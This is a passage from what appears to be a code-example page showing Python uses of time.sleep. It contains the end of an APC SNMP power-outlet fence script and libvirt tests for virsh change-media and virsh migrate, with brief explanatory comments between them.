                print "%s\n" % FENCE_RELEASE_NAME
                print "%s\n" % REDHAT_COPYRIGHT
                print "%s\n" % BUILD_DATE
                sys.exit(0)
            if o in ("-h", "--help"):
                usage()
                sys.exit(0)
            if o == "-n":
                port = a
            if o == "-o":
                lcase = a.lower()  # Lower case string
                if lcase == "off":
                    action = "outletOff"
                elif lcase == "on":
                    action = "outletOn"
                elif lcase == "reboot":
                    action = "outletReboot"
                elif lcase == "status":
                    #action = "sPDUOutletStatusMSPOutletState"
                    action = ""
                    status_check = True
                else:
                    usage()
                    sys.exit()
            if o == "-a":
                address = a

        if address == "":
            usage()
            sys.exit(1)

        if port == "":
            usage()
            sys.exit(1)

    else:  # Get opts from stdin
        params = {}
        # place params in dict
        for line in sys.stdin:
            val = line.split("=")
            if len(val) == 2:
                params[val[0].strip()] = val[1].strip()

        try:
            address = params["ipaddr"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing ipaddr param for fence_apc...exiting")
            sys.exit(1)
        try:
            login = params["login"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing login param for fence_apc...exiting")
            sys.exit(1)

        try:
            passwd = params["passwd"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing passwd param for fence_apc...exiting")
            sys.exit(1)

        try:
            port = params["port"]
        except KeyError, e:
            sys.stderr.write("FENCE: Missing port param for fence_apc...exiting")
            sys.exit(1)

        try:
            a = params["option"]
            if a == "Off" or a == "OFF" or a == "off":
                action = POWER_OFF
            elif a == "On" or a == "ON" or a == "on":
                action = POWER_ON
            elif a == "Reboot" or a == "REBOOT" or a == "reboot":
                action = POWER_REBOOT
        except KeyError, e:
            action = POWER_REBOOT

        # End of stdin section

    apc_command = apc_base + apc_outletctl + port

    args_status = list()
    args_off = list()
    args_on = list()

    args_status.append("/usr/bin/snmpget")
    args_status.append("-Oqu")  # sets printing options
    args_status.append("-v")
    args_status.append("1")
    args_status.append("-c")
    args_status.append("private")
    args_status.append("-m")
    args_status.append("ALL")
    args_status.append(address)
    args_status.append(apc_command)

    args_off.append("/usr/bin/snmpset")
    args_off.append("-Oqu")  # sets printing options
    args_off.append("-v")
    args_off.append("1")
    args_off.append("-c")
    args_off.append("private")
    args_off.append("-m")
    args_off.append("ALL")
    args_off.append(address)
    args_off.append(apc_command)
    args_off.append("i")
    args_off.append("outletOff")

    args_on.append("/usr/bin/snmpset")
    args_on.append("-Oqu")  # sets printing options
    args_on.append("-v")
    args_on.append("1")
    args_on.append("-c")
    args_on.append("private")
    args_on.append("-m")
    args_on.append("ALL")
    args_on.append(address)
    args_on.append(apc_command)
    args_on.append("i")
    args_on.append("outletOn")

    cmdstr_status = ' '.join(args_status)
    cmdstr_off = ' '.join(args_off)
    cmdstr_on = ' '.join(args_on)

# This section issues the actual commands. Reboot is split into
# Off, then On to make certain both actions work as planned.
#
# The status command just dumps the outlet status to stdout.
# The status checks that are made when turning an outlet on or off, though,
# use the execWithCaptureStatus so that the stdout from snmpget can be
# examined and the desired operation confirmed.

    if status_check:
        if verbose:
            fd = open("/tmp/apclog", "w")
            fd.write("Attempting the following command: %s\n" % cmdstr_status)
        strr = os.system(cmdstr_status)
        print strr
        if verbose:
            fd.write("Result: %s\n" % strr)
            fd.close()

    else:
        if action == POWER_OFF:
            if verbose:
                fd = open("/tmp/apclog", "w")
                fd.write("Attempting the following command: %s\n" % cmdstr_off)
            strr = os.system(cmdstr_off)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
                fd.close()
            if strr.find(POWER_OFF) >= 0:
                print "Success. Outlet off"
                sys.exit(0)
            else:
                if verbose:
                    fd.write("Unable to power off apc outlet")
                    fd.close()
                sys.exit(1)

        elif action == POWER_ON:
            if verbose:
                fd = open("/tmp/apclog", "w")
                fd.write("Attempting the following command: %s\n" % cmdstr_on)
            strr = os.system(cmdstr_on)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            #strr = os.system(cmdstr_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
            if strr.find(POWER_ON) >= 0:
                if verbose:
                    fd.close()
                print "Success. Outlet On."
                sys.exit(0)
            else:
                print "Unable to power on apc outlet"
                if verbose:
                    fd.write("Unable to power on apc outlet")
                    fd.close()
                sys.exit(1)

        elif action == POWER_REBOOT:
            if verbose:
                fd = open("/tmp/apclog", "w")
                fd.write("Attempting the following command: %s\n" % cmdstr_off)
            strr = os.system(cmdstr_off)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            #strr = os.system(cmdstr_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
            if strr.find(POWER_OFF) < 0:
                print "Unable to power off apc outlet"
                if verbose:
                    fd.write("Unable to power off apc outlet")
                    fd.close()
                sys.exit(1)

            if verbose:
                fd.write("Attempting the following command: %s\n" % cmdstr_on)
            strr = os.system(cmdstr_on)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            #strr = os.system(cmdstr_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
            if strr.find(POWER_ON) >= 0:
                if verbose:
                    fd.close()
                print "Success: Outlet Rebooted."
                sys.exit(0)
            else:
                print "Unable to power on apc outlet"
                if verbose:
                    fd.write("Unable to power on apc outlet")
                    fd.close()
                sys.exit(1)
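
Example 4 sleeps for one second after each snmpset so the outlet has time to change state before the follow-up snmpget confirms it. A condensed, hypothetical sketch of that set-then-verify sequence (the helper and its arguments are not part of the autotest script):

import subprocess
import time

def set_then_verify(set_cmd, status_cmd, expected, settle=1):
    # Illustrative helper: issue the set command, give the outlet a moment
    # to change state, then read the status back and check for the expected value.
    subprocess.call(set_cmd, shell=True)
    time.sleep(settle)
    output = subprocess.check_output(status_cmd, shell=True,
                                     universal_newlines=True)
    return expected in output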

Example 5

def run(test, params, env):
    """
    Test command: virsh change-media.

    The command changes the media used by CD or floppy drives.

    Test steps:
    1. Prepare test environment.
    2. Perform virsh change-media operation.
    3. Recover test environment.
    4. Confirm the test result.
    """

    def is_attached(vmxml_devices, disk_type, source_file, target_dev):
        """
        Check whether the attached device and disk exist.

        :param vmxml_devices: VMXMLDevices instance
        :param disk_type: disk's device type: cdrom or floppy
        :param source_file : disk's source file to check
        :param target_dev : target device name
        :return: True/False if backing file and device found
        """
        disks = vmxml_devices.by_device_tag('disk')
        for disk in disks:
            if disk.device != disk_type:
                continue
            if disk.target['dev'] != target_dev:
                continue
            if disk.xmltreefile.find('source') is not None:
                if disk.source.attrs['file'] != source_file:
                    continue
            else:
                continue
            # All three conditions met
            logging.debug("Find %s in given disk XML", source_file)
            return True
        logging.debug("Not find %s in gievn disk XML", source_file)
        return False

    def check_result(vm_name, disk_source, disk_type, disk_target,
                     flags, vm_state, attach=True):
        """
        Check the test result of attach/detach-device command.
        """
        active_vmxml = vm_xml.VMXML.new_from_dumpxml(vm_name)
        active_attached = is_attached(active_vmxml.devices, disk_type,
                                      disk_source, disk_target)
        if vm_state != "transient":
            inactive_vmxml = vm_xml.VMXML.new_from_dumpxml(vm_name,
                                                           options="--inactive")
            inactive_attached = is_attached(inactive_vmxml.devices, disk_type,
                                            disk_source, disk_target)

        if flags.count("config") and not flags.count("live"):
            if vm_state != "transient":
                if attach:
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --config options used for"
                                                  " attachment")
                    if vm_state != "shutoff":
                        if active_attached:
                            raise exceptions.TestFail("Active domain XML updated"
                                                      " when --config options used"
                                                      " for attachment")
                else:
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --config options used for"
                                                  " detachment")
                    if vm_state != "shutoff":
                        if not active_attached:
                            raise exceptions.TestFail("Active domain XML updated"
                                                      " when --config options used"
                                                      " for detachment")
        elif flags.count("live") and not flags.count("config"):
            if attach:
                if vm_state in ["paused", "running", "transient"]:
                    if not active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --live options used for"
                                                  " attachment")
                if vm_state in ["paused", "running"]:
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated"
                                                  " when --live options used for"
                                                  " attachment")
            else:
                if vm_state in ["paused", "running", "transient"]:
                    if active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --live options used for"
                                                  " detachment")
                if vm_state in ["paused", "running"]:
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated"
                                                  " when --live options used for"
                                                  " detachment")
        elif flags.count("live") and flags.count("config"):
            if attach:
                if vm_state in ["paused", "running"]:
                    if not active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --live --config options"
                                                  " used for attachment")
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --live --config options "
                                                  "used for attachment")
            else:
                if vm_state in ["paused", "running"]:
                    if active_attached:
                        raise exceptions.TestFail("Active domain XML not updated "
                                                  "when --live --config options "
                                                  "used for detachment")
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --live --config options "
                                                  "used for detachment")
        elif flags.count("current") or flags == "":
            if attach:
                if vm_state in ["paused", "running", "transient"]:
                    if not active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --current options used "
                                                  "for attachment")
                if vm_state in ["paused", "running"]:
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated "
                                                  "when --current options used "
                                                  "for live attachment")
                if vm_state == "shutoff" and not inactive_attached:
                    raise exceptions.TestFail("Inactive domain XML not updated "
                                              "when --current options used for "
                                              "attachment")
            else:
                if vm_state in ["paused", "running", "transient"]:
                    if active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --current options used "
                                                  "for detachment")
                if vm_state in ["paused", "running"]:
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated "
                                                  "when --current options used "
                                                  "for live detachment")
                if vm_state == "shutoff" and inactive_attached:
                    raise exceptions.TestFail("Inactive domain XML not updated "
                                              "when --current options used for "
                                              "detachment")

    vm_name = params.get("main_vm")
    vm = env.get_vm(vm_name)
    vm_ref = params.get("change_media_vm_ref")
    action = params.get("change_media_action")
    action_twice = params.get("change_media_action_twice", "")
    pre_vm_state = params.get("pre_vm_state")
    options = params.get("change_media_options")
    options_twice = params.get("change_media_options_twice", "")
    device_type = params.get("change_media_device_type", "cdrom")
    target_device = params.get("change_media_target_device", "hdc")
    init_iso_name = params.get("change_media_init_iso")
    old_iso_name = params.get("change_media_old_iso")
    new_iso_name = params.get("change_media_new_iso")
    virsh_dargs = {"debug": True, "ignore_status": True}

    if device_type not in ['cdrom', 'floppy']:
        raise exceptions.TestSkipError("Got a invalid device type:/n%s"
                                       % device_type)

    # Backup for recovery.
    vmxml_backup = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)

    old_iso = os.path.join(data_dir.get_tmp_dir(), old_iso_name)
    new_iso = os.path.join(data_dir.get_tmp_dir(), new_iso_name)

    if vm_ref == "name":
        vm_ref = vm_name

    if vm.is_alive():
        vm.destroy(gracefully=False)

    try:
        if not init_iso_name:
            init_iso = ""
        else:
            init_iso = os.path.join(data_dir.get_tmp_dir(),
                                    init_iso_name)

        # Prepare test files.
        libvirt.create_local_disk("iso", old_iso)
        libvirt.create_local_disk("iso", new_iso)

        # Check domain's disk device
        disk_blk = vm_xml.VMXML.get_disk_blk(vm_name)
        logging.info("disk_blk %s", disk_blk)
        if target_device not in disk_blk:
            if vm.is_alive():
                virsh.destroy(vm_name)
            logging.info("Adding device")
            libvirt.create_local_disk("iso", init_iso)
            disk_params = {"disk_type": "file", "device_type": device_type,
                           "driver_name": "qemu", "driver_type": "raw",
                           "target_bus": "ide", "readonly": "yes"}
            libvirt.attach_additional_device(vm_name, target_device,
                                             init_iso, disk_params)

        vmxml_for_test = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
        # Turn VM into certain state.
        if pre_vm_state == "running":
            logging.info("Starting %s..." % vm_name)
            if vm.is_dead():
                vm.start()
                vm.wait_for_login().close()
        elif pre_vm_state == "shutoff":
            logging.info("Shuting down %s..." % vm_name)
            if vm.is_alive():
                vm.destroy(gracefully=False)
        elif pre_vm_state == "paused":
            logging.info("Pausing %s..." % vm_name)
            if vm.is_dead():
                vm.start()
                vm.wait_for_login().close()
            if not vm.pause():
                raise exceptions.TestSkipError("Cann't pause the domain")
            time.sleep(5)
        elif pre_vm_state == "transient":
            logging.info("Creating %s..." % vm_name)
            vm.undefine()
            if virsh.create(vmxml_for_test.xml, **virsh_dargs).exit_status:
                vmxml_backup.define()
                raise exceptions.TestSkipError("Cann't create the domain")

        # Libvirt will ignore --source when action is eject
        attach = True
        device_source = old_iso
        if action == "--eject ":
            source = ""
            attach = False
        else:
            source = device_source

        all_options = action + options + " " + source
        ret = virsh.change_media(vm_ref, target_device,
                                 all_options, ignore_status=True, debug=True)
        status_error = False
        if pre_vm_state == "shutoff":
            if options.count("live"):
                status_error = True
        elif pre_vm_state == "transient":
            if options.count("config"):
                status_error = True

        if vm.is_paused():
            vm.resume()
            vm.wait_for_login().close()
            # For a paused vm, change_media for an eject/update operation
            # must be executed again for it to take effect
            if ret.exit_status:
                if not action.count("insert") and not options.count("force"):
                    ret = virsh.change_media(vm_ref, target_device, all_options,
                                             ignore_status=True, debug=True)
        if not status_error and ret.exit_status:
            raise exceptions.TestFail("Please check: Bug 1289069 - Ejecting "
                                      "locked cdrom tray using update-device"
                                      " fails but next try succeeds")
        libvirt.check_exit_status(ret, status_error)
        if not ret.exit_status:
            check_result(vm_name, device_source, device_type, target_device,
                         options, pre_vm_state, attach)

        if action_twice:
            if pre_vm_state == "paused":
                if not vm.pause():
                    raise exceptions.TestFail("Cann't pause the domain")
                time.sleep(5)
            attach = True
            device_source = new_iso
            if action_twice == "--eject ":
                #options_twice += " --force "
                source = ""
                attach = False
            else:
                source = device_source
            all_options = action_twice + options_twice + " " + source
            time.sleep(5)
            ret = virsh.change_media(vm_ref, target_device, all_options,
                                     ignore_status=True, debug=True)
            status_error = False
            if pre_vm_state == "shutoff":
                if options_twice.count("live"):
                    status_error = True
            elif pre_vm_state == "transient":
                if options_twice.count("config"):
                    status_error = True

            if action_twice == "--insert ":
                if pre_vm_state in ["running", "paused"]:
                    if options in ["--force", "--current", "", "--live"]:
                        if options_twice.count("config"):
                            status_error = True
                    elif options == "--config":
                        if options_twice in ["--force", "--current", ""]:
                            status_error = True
                        elif options_twice.count("live"):
                            status_error = True
                elif pre_vm_state == "transient":
                    if ret.exit_status:
                        status_error = True
                elif pre_vm_state == "shutoff":
                    if options.count("live"):
                        status_error = True
            if vm.is_paused():
                vm.resume()
                vm.wait_for_login().close()
                # For a paused vm, change_media for an eject/update operation
                # must be executed again for it to take effect
                if ret.exit_status and not action_twice.count("insert"):
                    ret = virsh.change_media(vm_ref, target_device, all_options,
                                             ignore_status=True, debug=True)
            if not status_error and ret.exit_status:
                raise exceptions.TestFail("Please check: Bug 1289069 - Ejecting "
                                          "locked cdrom tray using update-device"
                                          " fails but next try succeeds")
            libvirt.check_exit_status(ret, status_error)
            if not ret.exit_status:
                check_result(vm_name, device_source, device_type, target_device,
                             options_twice, pre_vm_state, attach)

        # Try to start vm.
        if vm.is_dead():
            vm.start()
            vm.wait_for_login().close()
    finally:
        if vm.is_alive():
            vm.destroy(gracefully=False)
        # Recover xml of vm.
        vmxml_backup.sync()
        # Remove disks
        if os.path.exists(init_iso):
            os.remove(init_iso)
        if os.path.exists(old_iso):
            os.remove(old_iso)
        if os.path.exists(new_iso):
            os.remove(new_iso)
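
The example above sleeps for a fixed five seconds after pausing the domain so the state settles before virsh change-media is issued, and re-runs the command once after resuming a paused guest. Below is a minimal, hypothetical sketch of that settle-and-retry pattern; settle_then_retry, run_cmd, settle and retries are illustrative names and not part of the test above.

import time

def settle_then_retry(run_cmd, settle=5, retries=1):
    """Sleep so a freshly paused/created domain can settle, run the
    command, and retry after another short sleep if it failed (mirrors
    the time.sleep(5) calls and the second change_media attempt above).
    run_cmd is any callable returning an exit status (0 == success)."""
    time.sleep(settle)
    status = run_cmd()
    for _ in range(retries):
        if status == 0:
            break
        time.sleep(settle)
        status = run_cmd()
    return status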

Example 6

Project: tp-libvirt
Source File: virsh_migrate.py
View license
def run(test, params, env):
    """
    Test virsh migrate command.
    """

    def check_vm_state(vm, state):
        """
        Return True if vm is in the correct state.
        """
        return vm.state() == state

    def cleanup_dest(vm, src_uri=""):
        """
        Clean up the destination host environment
        when doing the uni-direction migration.
        """
        logging.info("Cleaning up VMs on %s" % vm.connect_uri)
        try:
            if virsh.domain_exists(vm.name, uri=vm.connect_uri):
                vm_state = vm.state()
                if vm_state == "paused":
                    vm.resume()
                elif vm_state == "shut off":
                    vm.start()
                vm.destroy(gracefully=False)

                if vm.is_persistent():
                    vm.undefine()

        except Exception, detail:
            logging.error("Cleaning up destination failed.\n%s" % detail)

        if src_uri:
            vm.connect_uri = src_uri

    def check_migration_result(migration_res):
        """
        Check the migration result.

        :param migration_res: the CmdResult of migration

        :raise: exceptions.TestSkipError when some known messages found
        """
        logging.debug("Migration result:\n%s" % migration_res)
        if migration_res.stderr.find("error: unsupported configuration:") >= 0:
            raise exceptions.TestSkipError(migration_res.stderr)

    def do_migration(delay, vm, dest_uri, options, extra):
        logging.info("Sleeping %d seconds before migration" % delay)
        time.sleep(delay)
        # Migrate the guest.
        migration_res = vm.migrate(dest_uri, options, extra, True, True)
        logging.info("Migration exit status: %d", migration_res.exit_status)
        check_migration_result(migration_res)
        if int(migration_res.exit_status) != 0:
            logging.error("Migration failed for %s." % vm_name)
            return False

        if options.count("dname") or extra.count("dname"):
            vm.name = extra.split()[1].strip()

        if vm.is_alive():  # vm.connect_uri was updated
            logging.info("Alive guest found on destination %s." % dest_uri)
        else:
            if not options.count("offline"):
                logging.error("VM not alive on destination %s" % dest_uri)
                return False

        # Throws exception if console shows panic message
        vm.verify_kernel_crash()
        return True

    def numa_pin(memory_mode, memnode_mode, numa_dict_list, host_numa_node):
        """
        Creates the numatune memory dictionary and a list of
        numatune memnode dictionaries.

        :param memory_mode: memory mode of guest numa
        :param memnode_mode: memory mode list for each specific node
        :param numa_dict_list: list of guest numa
        :param host_numa_node: list of host numa
        :return: list of memnode dictionaries
        :return: memory dictionary
        """
        memory_placement = params.get("memory_placement", "static")
        memnode_list = []
        memory = {}
        memory['mode'] = str(memory_mode)
        memory['placement'] = str(memory_placement)

        if (len(numa_dict_list) == 1):
            # Only one guest numa node is available (single vcpu), so pin
            # it to one host numa node
            memnode_dict = {}
            memory['nodeset'] = str(host_numa_node[0])
            memnode_dict['cellid'] = "0"
            memnode_dict['mode'] = str(memnode_mode[0])
            memnode_dict['nodeset'] = str(memory['nodeset'])
            memnode_list.append(memnode_dict)

        else:
            for index in range(2):
                memnode_dict = {}
                memnode_dict['cellid'] = str(index)
                memnode_dict['mode'] = str(memnode_mode[index])
                if (len(host_numa_node) == 1):
                    # Both guest numa pinned to same host numa as 1 hostnuma
                    # available
                    memory['nodeset'] = str(host_numa_node[0])
                    memnode_dict['nodeset'] = str(memory['nodeset'])
                else:
                    # Both guest numa pinned to different host numa
                    memory['nodeset'] = "%s,%s" % (str(host_numa_node[0]),
                                                   str(host_numa_node[1]))
                    memnode_dict['nodeset'] = str(host_numa_node[index])
                memnode_list.append(memnode_dict)
        return memory, memnode_list

    def create_numa(vcpu, max_mem, max_mem_unit):
        """
        Creates a list of guest numa node dictionaries.

        :param vcpu: vcpus of existing guest
        :param max_mem: max_memory of existing guest
        :param max_mem_unit: unit of max_memory
        :return: numa dictionary list
        """
        numa_dict = {}
        numa_dict_list = []
        if vcpu == 1:
            numa_dict['id'] = '0'
            numa_dict['cpus'] = '0'
            numa_dict['memory'] = str(max_mem)
            numa_dict['unit'] = str(max_mem_unit)
            numa_dict_list.append(numa_dict)
        else:
            for index in range(2):
                numa_dict['id'] = str(index)
                numa_dict['memory'] = str(max_mem / 2)
                numa_dict['unit'] = str(max_mem_unit)
                if vcpu == 2:
                    numa_dict['cpus'] = "%s" % str(index)
                else:
                    if index == 0:
                        if vcpu == 3:
                            numa_dict['cpus'] = "%s" % str(index)
                        if vcpu > 3:
                            numa_dict['cpus'] = "%s-%s" % (str(index),
                                                           str(vcpu / 2 - 1))
                    else:
                        numa_dict['cpus'] = "%s-%s" % (str(vcpu / 2),
                                                       str(vcpu - 1))
                numa_dict_list.append(numa_dict)
                numa_dict = {}
        return numa_dict_list

    def enable_hugepage(vmname, no_of_HPs, hp_unit='', hp_node='', pin=False,
                        node_list=[], host_hp_size=0, numa_pin=False):
        """
        Creates a list of page tag dictionaries for hugepages.

        :param vmname: name of the guest
        :param no_of_HPs: Number of hugepages
        :param hp_unit: unit of HP size
        :param hp_node: number of numa nodes to be HP pinned
        :param pin: flag to pin HP with guest numa or not
        :param node_list: Numa node list
        :param host_hp_size: size of the HP to pin with guest numa
        :param numa_pin: flag to numa pin
        :return: list of page tag dictionary for HP pin
        """
        dest_machine = params.get("migrate_dest_host")
        server_user = params.get("server_user", "root")
        server_pwd = params.get("server_pwd")
        command = "cat /proc/meminfo | grep HugePages_Free"
        server_session = remote.wait_for_login('ssh', dest_machine, '22',
                                               server_user, server_pwd,
                                               r"[\#\$]\s*$")
        cmd_output = server_session.cmd_status_output(command)
        server_session.close()
        if (cmd_output[0] == 0):
            dest_HP_free = cmd_output[1].strip('HugePages_Free:').strip()
        else:
            raise error.TestNAError("HP not supported/configured")
        hp_list = []

        # setting hugepages in destination machine here as remote ssh
        # configuration is done
        hugepage_assign(str(no_of_HPs), target_ip=dest_machine,
                        user=server_user, password=server_pwd)
        logging.debug("Remote host hugepage config done")
        if numa_pin:
            for each_node in node_list:
                if (each_node['mode'] == 'strict'):
                    # reset source host hugepages
                    if int(utils_memory.get_num_huge_pages() > 0):
                        logging.debug("reset source host hugepages")
                        hugepage_assign("0")
                    # reset dest host hugepages
                    if (int(dest_HP_free) > 0):
                        logging.debug("reset dest host hugepages")
                        hugepage_assign("0", target_ip=dest_machine,
                                        user=server_user, password=server_pwd)
                    # set source host hugepages for the specific node
                    logging.debug("set src host hugepages for specific node")
                    hugepage_assign(str(no_of_HPs), node=each_node['nodeset'],
                                    hp_size=str(host_hp_size))
                    # set dest host hugepages for specific node
                    logging.debug("set dest host hugepages for specific node")
                    hugepage_assign(str(no_of_HPs), target_ip=dest_machine,
                                    node=each_node['nodeset'], hp_size=str(
                                    host_hp_size), user=server_user,
                                    password=server_pwd)
        if not pin:
            vm_xml.VMXML.set_memoryBacking_tag(vmname)
            logging.debug("Hugepage without pin")
        else:
            hp_dict = {}
            hp_dict['size'] = str(host_hp_size)
            hp_dict['unit'] = str(hp_unit)
            if int(hp_node) == 1:
                hp_dict['nodeset'] = "0"
                logging.debug("Hugepage with pin to 1 node")
            else:
                hp_dict['nodeset'] = "0-1"
                logging.debug("Hugepage with pin to both nodes")
            hp_list.append(hp_dict)
            logging.debug(hp_list)
        return hp_list

    def hugepage_assign(hp_num, target_ip='', node='', hp_size='', user='',
                        password=''):
        """
        Allocates hugepages for src and dst machines

        :param hp_num: number of hugepages
        :param target_ip: ip address of destination machine
        :param node: numa node to which HP have to be allocated
        :param hp_size: hugepage size
        :param user: remote machine's username
        :param password: remote machine's password
        """
        command = ""
        if node == '':
            if target_ip == '':
                utils_memory.set_num_huge_pages(int(hp_num))
            else:
                command = "echo %s > /proc/sys/vm/nr_hugepages" % (hp_num)
        else:
            command = "echo %s > /sys/devices/system/node/node" % (hp_num)
            command += "%s/hugepages/hugepages-%skB/" % (str(node), hp_size)
            command += "nr_hugepages"
        if command != "":
            if target_ip != "":
                server_session = remote.wait_for_login('ssh', target_ip, '22',
                                                       user, password,
                                                       r"[\#\$]\s*$")
                cmd_output = server_session.cmd_status_output(command)
                server_session.close()
                if (cmd_output[0] != 0):
                    raise error.TestNAError("HP not supported/configured")
            else:
                process.system_output(command, verbose=True, shell=True)

    def create_mem_hotplug_xml(mem_size, mem_unit, numa_node='',
                               mem_model='dimm'):
        """
        Forms and returns the memory device xml for hotplugging.

        :param mem_size: memory to be hotplugged
        :param mem_unit: unit for memory size
        :param numa_node: numa node to which memory is hotplugged
        :param mem_model: memory model to be hotplugged
        :return: xml with memory device
        """
        mem_xml = memory.Memory()
        mem_xml.mem_model = mem_model
        target_xml = memory.Memory.Target()
        target_xml.size = mem_size
        target_xml.size_unit = mem_unit
        if numa_node:
            target_xml.node = int(numa_node)
        mem_xml.target = target_xml
        logging.debug(mem_xml)
        mem_xml_file = os.path.join(data_dir.get_tmp_dir(),
                                    'memory_hotplug.xml')
        try:
            fp = open(mem_xml_file, 'w')
        except Exception, info:
            raise exceptions.TestError(info)
        fp.write(str(mem_xml))
        fp.close()
        return mem_xml_file

    def check_migration_timeout_suspend(params):
        """
        Handle option '--timeout --timeout-suspend'.
        As the migration thread begins to execute, this function is executed
        at almost the same time. It sleeps for the specified number of seconds
        and then checks the VM state on both hosts; both should be 'paused'.

        :param params: The parameters used

        :raise: exceptions.TestFail if the VM state is not as expected
        """
        timeout = int(params.get("timeout_before_suspend", 5))
        server_ip = params.get("server_ip")
        server_user = params.get("server_user", "root")
        server_pwd = params.get("server_pwd")
        vm_name = params.get("migrate_main_vm")
        vm = params.get("vm_migration")
        logging.debug("Wait for %s seconds as specified by --timeout", timeout)
        # --timeout <seconds> --timeout-suspend means the vm state will change
        # to paused when live migration exceeds <seconds>. The migration
        # command is executed asynchronously on a separate thread, so it may
        # take a few seconds to start that thread and run other helper logic
        # before the virsh migrate command actually runs. A buffer is
        # therefore added to avoid the timing gap; one second is a usable choice.
        time.sleep(timeout + 1)
        logging.debug("Check vm state on source host after timeout")
        vm_state = vm.state()
        if vm_state != "paused":
            raise exceptions.TestFail("After timeout '%s' seconds, "
                                      "the vm state on source host should "
                                      "be 'paused', but %s found",
                                      timeout, vm_state)
        logging.debug("Check vm state on target host after timeout")
        virsh_dargs = {'remote_ip': server_ip, 'remote_user': server_user,
                       'remote_pwd': server_pwd, 'unprivileged_user': None,
                       'ssh_remote_auth': True}
        new_session = virsh.VirshPersistent(**virsh_dargs)
        vm_state = new_session.domstate(vm_name).stdout.strip()
        if vm_state != "paused":
            raise exceptions.TestFail("After timeout '%s' seconds, "
                                      "the vm state on target host should "
                                      "be 'paused', but %s found",
                                      timeout, vm_state)
        new_session.close_session()

    for v in params.itervalues():
        if isinstance(v, str) and v.count("EXAMPLE"):
            raise exceptions.TestSkipError("Please set real value for %s" % v)

    # Check the required parameters
    extra = params.get("virsh_migrate_extra")
    migrate_uri = params.get("virsh_migrate_migrateuri", None)
    # Add migrateuri if exists and check for default example
    if migrate_uri:
        extra = ("%s --migrateuri=%s" % (extra, migrate_uri))

    graphics_uri = params.get("virsh_migrate_graphics_uri", "")
    if graphics_uri:
        extra = "--graphicsuri %s" % graphics_uri

    shared_storage = params.get("migrate_shared_storage", "")
    # use default image jeos-23-64
    if shared_storage == "":
        default_guest_asset = defaults.get_default_guest_os_info()['asset']
        shared_storage = params.get("nfs_mount_dir")
        shared_storage += ('/' + default_guest_asset + '.qcow2')

    options = params.get("virsh_migrate_options")
    # Direct migration is supported only for Xen in libvirt
    if options.count("direct") or extra.count("direct"):
        if params.get("driver_type") is not "xen":
            raise error.TestNAError("Direct migration is supported only for "
                                    "Xen in libvirt.")

    if (options.count("compressed") and not
            virsh.has_command_help_match("migrate", "--compressed")):
        raise error.TestNAError("Do not support compressed option "
                                "on this version.")

    if (options.count("graphicsuri") and not
            virsh.has_command_help_match("migrate", "--graphicsuri")):
        raise error.TestNAError("Do not support 'graphicsuri' option"
                                "on this version.")

    src_uri = params.get("virsh_migrate_connect_uri")
    dest_uri = params.get("virsh_migrate_desturi")

    graphics_server = params.get("graphics_server")
    if graphics_server:
        try:
            remote_viewer_executable = path.find_command('remote-viewer')
        except path.CmdNotFoundError:
            raise error.TestNAError("No 'remote-viewer' command found.")

    vm_name = params.get("migrate_main_vm")
    vm = env.get_vm(vm_name)
    vm.verify_alive()

    # For safety reasons, we'd better back up the xml file.
    orig_config_xml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    if not orig_config_xml:
        raise exceptions.TestError("Backing up xmlfile failed.")

    vmxml = orig_config_xml.copy()
    graphic = vmxml.get_device_class('graphics')()

    # Params to update disk using shared storage
    params["disk_type"] = "file"
    params["disk_source_protocol"] = "netfs"
    params["mnt_path_name"] = params.get("nfs_mount_dir")

    # Params for NFS and SSH setup
    params["server_ip"] = params.get("migrate_dest_host")
    params["server_user"] = "root"
    params["server_pwd"] = params.get("migrate_dest_pwd")
    params["client_ip"] = params.get("migrate_source_host")
    params["client_user"] = "root"
    params["client_pwd"] = params.get("migrate_source_pwd")
    params["nfs_client_ip"] = params.get("migrate_dest_host")
    params["nfs_server_ip"] = params.get("migrate_source_host")

    # Params to enable SELinux boolean on remote host
    params["remote_boolean_varible"] = "virt_use_nfs"
    params["remote_boolean_value"] = "on"
    params["set_sebool_remote"] = "yes"

    server_ip = params.get("server_ip")
    server_user = params.get("server_user", "root")
    server_pwd = params.get("server_pwd")

    graphics_type = params.get("graphics_type")
    graphics_port = params.get("graphics_port")
    graphics_listen = params.get("graphics_listen")
    graphics_autoport = params.get("graphics_autoport", "yes")
    graphics_listen_type = params.get("graphics_listen_type")
    graphics_listen_addr = params.get("graphics_listen_addr")

    # Update graphic XML
    if graphics_type and graphic.get_type() != graphics_type:
        graphic.set_type(graphics_type)
    if graphics_port:
        graphic.port = graphics_port
    if graphics_autoport:
        graphic.autoport = graphics_autoport
    if graphics_listen:
        graphic.listen = graphics_listen
    if graphics_listen_type:
        graphic.listen_type = graphics_listen_type
